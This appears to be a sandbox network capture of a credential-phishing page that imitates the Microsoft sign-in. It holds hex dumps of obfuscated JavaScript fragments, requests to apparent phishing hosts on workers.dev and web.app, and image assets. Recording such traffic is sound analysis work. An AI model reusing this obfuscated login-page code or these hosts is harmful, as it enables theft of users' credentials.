2024-02-09 10:09:51 UTC	1378	IN	Data Raw: 32 76 30 43 4d 76 4b 41 78 6a 4c 79 33 71 3d 22 2c 22 74 4d 76 30 44 32 39 59 41 59 62 66 43 4e 69 3d 22 2c 22 69 49 62 55 79 77 31 4c 70 73 6a 55 79 4d 75 3d 22 2c 22 43 68 76 30 69 67 35 48 42 77 75 39 69 4b 57 3d 22 2c 22 74 4d 66 54 7a 73 7a 58 44 77 39 30 6f 57 3d 3d 22 2c 22 70 4a 58 48 69 67 48 59 7a 77 79 39 69 49 34 3d 22 2c 22 41 77 71 39 69 4d 58 56 7a 32 4c 55 73 67 75 3d 22 2c 22 79 77 7a 4c 78 33 76 5a 7a 78 6a 55 79 77 30 3d 22 2c 22 44 32 48 50 42 67 75 47 6b 68 72 59 44 77 75 3d 22 2c 22 7a 67 76 4d 79 78 76 53 44 68 6d 3d 22 2c 22 7a 74 53 4d 69 33 47 33 6e 74 53 4d 69 33 47 3d 22 2c 22 43 4d 54 4c 44 68 6a 4c 7a 67 4c 59 7a 77 6d 3d 22 2c 22 69 4c 62 53 7a 77 66 5a 7a 73 62 33 79 77 4b 3d 22 2c 22 79 4d 66 5a 7a 76 76 73 74 61 3d 3d 22 Data Ascii: 2v0CMvKAxjLy3q=","tMv0D29YAYbfCNi=","iIbUyw1LpsjUyMu=","Chv0ig5HBwu9iKW=","tMfTzszXDw90oW==","pJXHigHYzwy9iI4=","Awq9iMXVz2LUsgu=","ywzLx3vZzxjUyw0=","D2HPBguGkhrYDwu=","zgvMyxvSDhm=","ztSMi3G3ntSMi3G=","CMTLDhjLzgLYzwm=","iLbSzwfZzsb3ywK=","yMfZzvvsta=="
2024-02-09 10:09:51 UTC	1378	IN	Data Raw: 38 41 64 69 2b 45 33 54 30 45 68 71 3d 22 2c 22 44 32 76 49 6c 4d 66 57 43 63 39 5a 7a 68 47 3d 22 2c 22 7a 64 6e 4c 79 4a 69 57 79 5a 76 4b 6d 32 75 3d 22 2c 22 6a 4e 66 31 42 33 71 37 79 75 34 4d 43 78 75 3d 22 2c 22 77 74 69 49 69 64 50 5a 44 68 4c 53 7a 74 30 3d 22 2c 22 70 4a 58 4f 6d 73 62 4a 42 67 66 5a 43 5a 30 3d 22 2c 22 7a 63 62 5a 44 67 39 59 79 77 44 4c 69 67 65 3d 22 2c 22 41 77 31 4e 69 68 6e 59 79 5a 30 49 41 68 71 3d 22 2c 22 41 68 72 30 43 68 6d 36 6c 59 39 48 79 77 71 3d 22 2c 22 6e 4a 66 48 7a 4d 69 58 6d 74 69 32 45 68 43 3d 22 2c 22 72 4b 6e 30 42 31 6a 6a 71 77 50 35 75 75 43 3d 22 2c 22 79 78 6e 5a 70 73 6a 75 6d 77 69 30 6f 74 65 3d 22 2c 22 7a 33 6d 56 42 77 4c 4a 43 4d 39 5a 42 32 79 3d 22 2c 22 42 4d 76 30 6c 33 6e 4f 79 78 6a Data Ascii: 8Adi+E3T0Ehq=","D2vIlMfWCc9ZzhG=","zdnLyJiWyZvKm2u=","jNf1B3q7yu4MCxu=","wtiIidPZDhLSzt0=","pJXOmsbJBgfZCZ0=","zcbZDg9YywDLige=","Aw1NihnYyZ0IAhq=","Ahr0Chm6lY9Hywq=","nJfHzMiXmti2EhC=","rKn0B1jjqwP5uuC=","yxnZpsjumwi0ote=","z3mVBwLJCM9ZB2y=","BMv0l3nOyxj
2024-02-09 10:09:51 UTC	1378	IN	Data Raw: 6d 3d 22 2c 22 7a 77 6e 30 6c 77 72 50 79 77 58 56 7a 59 69 3d 22 2c 22 6f 67 69 34 7a 75 54 4a 72 76 4f 49 70 4a 57 3d 22 2c 22 42 4d 43 54 79 77 35 30 43 59 31 4a 42 32 34 3d 22 2c 22 42 4a 54 54 79 78 47 54 41 67 76 50 7a 32 47 3d 22 2c 22 79 77 6e 35 74 67 4c 55 41 59 58 4a 42 67 4b 3d 22 2c 22 43 32 48 4a 42 4d 72 48 43 68 61 55 44 32 75 3d 22 2c 22 44 67 76 5a 44 61 3d 3d 22 2c 22 6a 49 6e 34 6e 5a 75 37 6a 49 6e 34 6e 5a 71 3d 22 2c 22 79 78 72 30 22 2c 22 42 76 72 69 69 68 4f 59 7a 64 69 5a 6e 74 43 3d 22 2c 22 6d 73 34 57 6c 32 6e 56 42 4e 72 4c 42 4e 71 3d 22 2c 22 69 64 69 57 6d 4a 6d 47 71 32 39 57 45 78 69 3d 22 2c 22 70 63 39 4b 41 78 79 2b 70 67 72 50 44 49 61 3d 22 2c 22 6b 63 61 51 78 63 4b 3d 22 2c 22 41 77 35 4b 70 73 6a 54 42 33 7a 4c Data Ascii: m=","zwn0lwrPywXVzYi=","ogi4zuTJrvOIpJW=","BMCTyw50CY1JB24=","BJTTyxGTAgvPz2G=","ywn5tgLUAYXJBgK=","C2HJBMrHChaUD2u=","DgvZDa==","jIn4nZu7jIn4nZq=","yxr0","BvriihOYzdiZntC=","ms4Wl2nVBNrLBNq=","idiWmJmGq29WExi=","pc9KAxy+pgrPDIa=","kcaQxcK=","Aw5KpsjTB3zL
2024-02-09 10:09:51 UTC	1378	IN	Data Raw: 31 5b 6e 3d 2b 6e 5d 3b 76 6f 69 64 20 30 3d 3d 3d 6e 6c 2e 68 4e 53 6e 49 62 26 26 28 6e 6c 2e 76 69 54 7a 75 64 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 66 6f 72 28 76 61 72 20 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 66 6f 72 28 76 61 72 20 78 2c 6c 2c 69 3d 53 74 72 69 6e 67 28 6e 29 2e 72 65 70 6c 61 63 65 28 2f 3d 2b 24 2f 2c 22 22 29 2c 74 3d 22 22 2c 65 3d 30 2c 61 3d 30 3b 6c 3d 69 2e 63 68 61 72 41 74 28 61 2b 2b 29 3b 7e 6c 26 26 28 78 3d 65 25 34 3f 36 34 2a 78 2b 6c 3a 6c 2c 65 2b 2b 25 34 29 26 26 28 74 2b 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 32 35 35 26 78 3e 3e 28 2d 32 2a 65 26 36 29 29 29 29 6c 3d 22 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 41 42 43 44 45 46 47 48 49 4a 4b 4c Data Ascii: 1[n=+n];void 0===nl.hNSnIb&&(nl.viTzud=function(n){for(var x=function(n){for(var x,l,i=String(n).replace(/=+$/,""),t="",e=0,a=0;l=i.charAt(a++);~l&&(x=e%4?64x+l:l,e++%4)&&(t+=String.fromCharCode(255&x>>(-2e&6))))l="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKL
2024-02-09 10:09:51 UTC	1378	IN	Data Raw: 61 72 20 74 3d 71 6f 5b 6e 6c 28 22 30 78 31 66 22 29 5d 5b 6e 6c 28 22 30 78 31 37 63 22 29 5d 5b 6e 6c 28 22 30 78 31 31 39 22 29 5d 28 71 6f 29 2c 65 3d 6c 5b 69 5d 2c 61 3d 78 5b 65 5d 7c 7c 74 3b 74 5b 6e 6c 28 22 30 78 39 34 22 29 5d 3d 71 6f 5b 6e 6c 28 22 30 78 31 31 39 22 29 5d 28 71 6f 29 2c 74 5b 6e 6c 28 22 30 78 66 62 22 29 5d 3d 61 5b 6e 6c 28 22 30 78 66 62 22 29 5d 5b 6e 6c 28 22 30 78 31 31 39 22 29 5d 28 61 29 2c 78 5b 65 5d 3d 74 7d 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 6a 62 28 6e 29 7b 66 75 6e 63 74 69 6f 6e 20 78 28 6e 29 7b 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 6e 29 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 7d 5b 6e 6c 28 22 30 78 31 66 22 29 5d 28 6e 6c 28 22 30 78 62 64 22 29 2b 22 29 20 7b 7d Data Ascii: ar t=qo[nl("0x1f")][nl("0x17c")][nl("0x119")](qo),e=l[i],a=x[e]\|\|t;t[nl("0x94")]=qo[nl("0x119")](qo),t[nl("0xfb")]=a[nl("0xfb")][nl("0x119")](a),x[e]=t}});function jb(n){function x(n){if("string"==typeof n)return function(n){}[nl("0x1f")](nl("0xbd")+") {}
2024-02-09 10:09:51 UTC	1378	IN	Data Raw: 22 29 2b 27 66 6d 74 22 20 64 61 74 61 2d 62 27 2b 6e 6c 28 22 30 78 31 35 39 22 29 2b 6e 6c 28 22 30 78 31 33 35 22 29 2b 6e 6c 28 22 30 78 62 31 22 29 2b 27 69 73 70 6c 61 79 4e 61 6d 65 22 27 2b 6e 6c 28 22 30 78 34 34 22 29 2b 6e 6c 28 22 30 78 36 34 22 29 2b 6e 6c 28 22 30 78 32 32 22 29 2b 6e 6c 28 22 30 78 63 39 22 29 2b 6e 6c 28 22 30 78 61 35 22 29 2b 6e 6c 28 22 30 78 38 36 22 29 2b 27 75 65 3d 22 22 20 74 79 70 65 3d 27 2b 6e 6c 28 22 30 78 33 31 22 29 2b 6e 6c 28 22 30 78 35 65 22 29 2b 27 70 65 22 20 64 61 74 61 2d 62 69 27 2b 6e 6c 28 22 30 78 65 33 22 29 2b 6e 6c 28 22 30 78 36 64 22 29 2b 6e 6c 28 22 30 78 32 34 22 29 2b 6e 6c 28 22 30 78 31 62 38 22 29 2b 6e 6c 28 22 30 78 37 37 22 29 2b 6e 6c 28 22 30 78 62 38 22 29 2b 27 6f 67 69 6e 4f Data Ascii: ")+'fmt" data-b'+nl("0x159")+nl("0x135")+nl("0xb1")+'isplayName"'+nl("0x44")+nl("0x64")+nl("0x22")+nl("0xc9")+nl("0xa5")+nl("0x86")+'ue="" type='+nl("0x31")+nl("0x5e")+'pe" data-bi'+nl("0xe3")+nl("0x6d")+nl("0x24")+nl("0x1b8")+nl("0x77")+nl("0xb8")+'oginO
2024-02-09 10:09:51 UTC	1378	IN	Data Raw: 6e 6c 28 22 30 78 31 34 64 22 29 2b 22 74 72 6f 6c 27 2c 61 72 69 61 4c 22 2b 6e 6c 28 22 30 78 31 30 66 22 29 2b 22 46 5f 53 54 52 5f 50 72 6f 67 72 65 73 73 54 65 78 74 27 5d 5c 22 20 22 2b 6e 6c 28 22 30 78 31 31 62 22 29 2b 6e 6c 28 22 30 78 63 31 22 29 2b 27 74 22 3e 3c 64 69 76 3e 3c 2f 64 27 2b 6e 6c 28 22 30 78 32 37 22 29 2b 6e 6c 28 22 30 78 32 37 22 29 2b 6e 6c 28 22 30 78 32 37 22 29 2b 22 69 76 3e 3c 64 69 76 3e 3c 2f 64 22 2b 6e 6c 28 22 30 78 31 38 22 29 2b 6e 6c 28 22 30 78 31 62 22 29 2b 6e 6c 28 22 30 78 39 38 22 29 2b 6e 6c 28 22 30 78 38 37 22 29 2b 6e 6c 28 22 30 78 62 37 22 29 2b 6e 6c 28 22 30 78 36 66 22 29 2b 27 22 3e 3c 2f 64 69 76 3e 3c 2f 64 27 2b 6e 6c 28 22 30 78 31 38 22 29 2b 6e 6c 28 22 30 78 65 34 22 29 2b 6e 6c 28 22 30 Data Ascii: nl("0x14d")+"trol',ariaL"+nl("0x10f")+"F_STR_ProgressText']\" "+nl("0x11b")+nl("0xc1")+'t"><div></d'+nl("0x27")+nl("0x27")+nl("0x27")+"iv><div></d"+nl("0x18")+nl("0x1b")+nl("0x98")+nl("0x87")+nl("0xb7")+nl("0x6f")+'"></div></d'+nl("0x18")+nl("0xe4")+nl("0

Timestamp	Bytes transferred	Direction	Data
2024-02-09 10:09:51 UTC	656	OUT	GET /sdxhetfdzzdsdsdxz/themes/imgs/microsoft_logo.svg HTTP/1.1 Host: rullbullpullpushcndapp.web.app Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://khanmotiozpisx.ellieb7.workers.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-02-09 10:09:51 UTC	595	IN	HTTP/1.1 200 OK Connection: close Content-Length: 3651 Cache-Control: max-age=3600 Content-Type: image/svg+xml Etag: "a88f22478e52f27f6f24668e3ff397bf66ba51e21b2cc2375100de1d281417be" Last-Modified: Wed, 07 Feb 2024 17:24:12 GMT Strict-Transport-Security: max-age=31556926; includeSubDomains; preload Accept-Ranges: bytes Date: Fri, 09 Feb 2024 10:09:51 GMT X-Served-By: cache-pdk-kfty2130049-PDK X-Cache: HIT X-Cache-Hits: 1 X-Timer: S1707473392.680068,VS0,VE1 Vary: x-fh-requested-host, accept-encoding alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
2024-02-09 10:09:51 UTC	1378	IN	Data Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 30 38 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 38 20 32 34 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 70 61 74 68 20 64 3d 22 4d 34 34 2e 38 33 36 2c 34 2e 36 56 31 38 2e 34 68 2d 32 2e 34 56 37 2e 35 38 33 48 34 32 2e 34 4c 33 38 2e 31 31 39 2c 31 38 2e 34 48 33 36 2e 35 33 31 4c 33 32 2e 31 34 32 2c 37 2e 35 38 33 68 2d 2e 30 32 39 56 31 38 2e 34 48 32 39 2e 39 56 34 2e 36 68 33 2e 34 33 36 4c 33 37 2e 33 2c 31 34 2e 38 33 68 2e 30 35 38 4c 34 31 2e 35 34 35 2c 34 2e 36 5a 6d 32 2c 31 2e 30 34 39 61 31 2e 32 36 38 2c 31 2e 32 36 38 2c 30 Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0
2024-02-09 10:09:51 UTC	1378	IN	Data Raw: 30 2c 30 2c 31 2d 33 2e 36 35 32 2d 31 2e 33 35 32 41 34 2e 39 38 37 2c 34 2e 39 38 37 2c 30 2c 30 2c 31 2c 36 36 2e 34 30 36 2c 31 33 2e 36 6d 32 2e 34 32 35 2d 2e 30 37 37 61 33 2e 35 33 35 2c 33 2e 35 33 35 2c 30 2c 30 2c 30 2c 2e 37 2c 32 2e 33 36 38 2c 32 2e 35 30 35 2c 32 2e 35 30 35 2c 30 2c 30 2c 30 2c 32 2e 30 31 31 2e 38 31 38 2c 32 2e 33 34 35 2c 32 2e 33 34 35 2c 30 2c 30 2c 30 2c 31 2e 39 33 34 2d 2e 38 31 38 2c 33 2e 37 38 33 2c 33 2e 37 38 33 2c 30 2c 30 2c 30 2c 2e 36 36 34 2d 32 2e 34 32 35 2c 33 2e 36 35 31 2c 33 2e 36 35 31 2c 30 2c 30 2c 30 2d 2e 36 38 38 2d 32 2e 34 31 31 2c 32 2e 33 38 39 2c 32 2e 33 38 39 2c 30 2c 30 2c 30 2d 31 2e 39 32 39 2d 2e 38 31 33 2c 32 2e 34 34 2c 32 2e 34 34 2c 30 2c 30 2c 30 2d 31 2e 39 38 38 2e 38 35 32 Data Ascii: 0,0,1-3.652-1.352A4.987,4.987,0,0,1,66.406,13.6m2.425-.077a3.535,3.535,0,0,0,.7,2.368,2.505,2.505,0,0,0,2.011.818,2.345,2.345,0,0,0,1.934-.818,3.783,3.783,0,0,0,.664-2.425,3.651,3.651,0,0,0-.688-2.411,2.389,2.389,0,0,0-1.929-.813,2.44,2.44,0,0,0-1.988.852
2024-02-09 10:09:51 UTC	895	IN	Data Raw: 39 2c 30 2c 30 2c 30 2d 31 2e 39 38 37 2e 38 35 32 2c 33 2e 37 30 37 2c 33 2e 37 30 37 2c 30 2c 30 2c 30 2d 2e 37 30 37 2c 32 2e 34 33 6d 31 35 2e 34 36 34 2d 33 2e 31 30 39 48 39 39 2e 37 56 31 38 2e 34 48 39 37 2e 33 34 31 56 31 30 2e 34 31 32 48 39 35 2e 36 38 36 56 38 2e 35 30 37 68 31 2e 36 35 35 56 37 2e 31 33 61 33 2e 34 32 33 2c 33 2e 34 32 33 2c 30 2c 30 2c 31 2c 31 2e 30 31 35 2d 32 2e 35 35 35 2c 33 2e 35 36 31 2c 33 2e 35 36 31 2c 30 2c 30 2c 31 2c 32 2e 36 2d 31 2c 35 2e 38 30 37 2c 35 2e 38 30 37 2c 30 2c 30 2c 31 2c 2e 37 35 31 2e 30 34 33 2c 32 2e 39 39 33 2c 32 2e 39 39 33 2c 30 2c 30 2c 31 2c 2e 35 37 37 2e 31 33 56 35 2e 37 36 34 61 32 2e 34 32 32 2c 32 2e 34 32 32 2c 30 2c 30 2c 30 2d 2e 34 2d 2e 31 36 34 2c 32 2e 31 30 37 2c 32 2e 31 Data Ascii: 9,0,0,0-1.987.852,3.707,3.707,0,0,0-.707,2.43m15.464-3.109H99.7V18.4H97.341V10.412H95.686V8.507h1.655V7.13a3.423,3.423,0,0,1,1.015-2.555,3.561,3.561,0,0,1,2.6-1,5.807,5.807,0,0,1,.751.043,2.993,2.993,0,0,1,.577.13V5.764a2.422,2.422,0,0,0-.4-.164,2.107,2.1

Timestamp	Bytes transferred	Direction	Data
2024-02-09 10:09:51 UTC	656	OUT	GET /sdxhetfdzzdsdsdxz/themes/imgs/ellipsis_white.svg HTTP/1.1 Host: rullbullpullpushcndapp.web.app Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://khanmotiozpisx.ellieb7.workers.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-02-09 10:09:51 UTC	594	IN	HTTP/1.1 200 OK Connection: close Content-Length: 915 Cache-Control: max-age=3600 Content-Type: image/svg+xml Etag: "b1336d85e1a0c89eea2a4969953d0326f0faedd47871ea522033f7f6e513ea57" Last-Modified: Wed, 07 Feb 2024 17:24:12 GMT Strict-Transport-Security: max-age=31556926; includeSubDomains; preload Accept-Ranges: bytes Date: Fri, 09 Feb 2024 10:09:51 GMT X-Served-By: cache-pdk-kfty2130089-PDK X-Cache: HIT X-Cache-Hits: 1 X-Timer: S1707473392.699359,VS0,VE1 Vary: x-fh-requested-host, accept-encoding alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
2024-02-09 10:09:51 UTC	915	IN	Data Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 36 22 20 68 65 69 67 68 74 3d 22 31 36 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 36 20 31 36 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 66 66 66 66 66 66 22 20 64 3d 22 4d 31 2e 31 34 33 2c 36 2e 38 35 37 61 31 2e 31 30 37 2c 31 2e 31 30 37 2c 30 2c 30 2c 31 2c 2e 34 34 36 2e 30 38 39 2c 31 2e 31 36 34 2c 31 2e 31 36 34 2c 30 2c 30 2c 31 2c 2e 36 30 37 2e 36 30 37 2c 31 2e 31 36 31 2c 31 2e 31 36 31 2c 30 2c 30 2c 31 2c 30 2c 2e 38 39 33 2c 31 2e 31 36 34 2c 31 2e 31 36 34 2c 30 2c 30 2c 31 2d 2e 36 30 37 2e 36 30 37 2c 31 2e 31 30 37 2c 31 2e Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 16 16"><title>assets</title><path fill="#ffffff" d="M1.143,6.857a1.107,1.107,0,0,1,.446.089,1.164,1.164,0,0,1,.607.607,1.161,1.161,0,0,1,0,.893,1.164,1.164,0,0,1-.607.607,1.107,1.

Timestamp	Bytes transferred	Direction	Data
2024-02-09 10:09:51 UTC	669	OUT	GET /ests/2.1/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1 Host: aadcdn.msauth.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://khanmotiozpisx.ellieb7.workers.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-02-09 10:09:52 UTC	779	IN	HTTP/1.1 200 OK Date: Fri, 09 Feb 2024 10:09:52 GMT Content-Type: image/svg+xml Content-Length: 673 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Thu, 13 Feb 2020 02:05:12 GMT ETag: 0x8D7B0292911C366 x-ms-request-id: 339278e0-901e-005b-2940-5ba3ba000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240209T100951Z-r9zyvup7fp5bd04z7879tk2ngn00000006r00000000030ws x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-02-09 10:09:52 UTC	673	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 b5 55 db 6e db 30 0c fd 15 c1 7d 69 1e ac 50 b2 ae 43 1c a0 37 6c 2f c3 0a 64 fd 80 d4 b1 13 03 ae 1d d8 6e d3 f6 eb 47 ca f6 96 0c 79 6c 10 20 e6 91 45 f2 f0 98 94 16 dd db 96 bd bf 54 75 97 46 bb be df 7f 9b cf 0f 87 03 3f 24 bc 69 b7 73 09 00 73 dc 11 b1 43 b9 e9 77 69 24 bc 84 88 ed f2 72 bb eb 11 81 43 54 94 55 95 46 75 53 e7 d1 72 b1 65 cd 7e 9d 95 fd 47 1a 71 19 b1 ac 2a f7 f1 7e 4d ae af 6d 75 7d f5 30 c3 3d 84 d9 26 8d 7e 0a 65 0c 57 4c 58 af b9 cc bc 06 9e 58 06 88 25 70 17 1b 69 b9 96 13 12 0a 04 37 2b a9 84 e1 d6 c6 02 c0 b1 c1 3f d8 b1 d4 0a cd c4 01 57 4e 0e 88 25 3e e1 a6 b3 16 d7 24 ed a6 08 63 bc 11 7d 4e f4 03 bb 9b 59 34 3f a2 97 78 c5 31 bf 13 9a 9b cc 2a c3 b5 23 76 89 16 c8 47 61 6c 39 01 21 02 39 81 41 Data Ascii: Un0}iPC7l/dnGyl ETuF?$issCwi$rCTUFuSre~Gq~Mmu}0=&~eWLXX%pi7+?WN%>$c}NY4?x1#vGal9!9A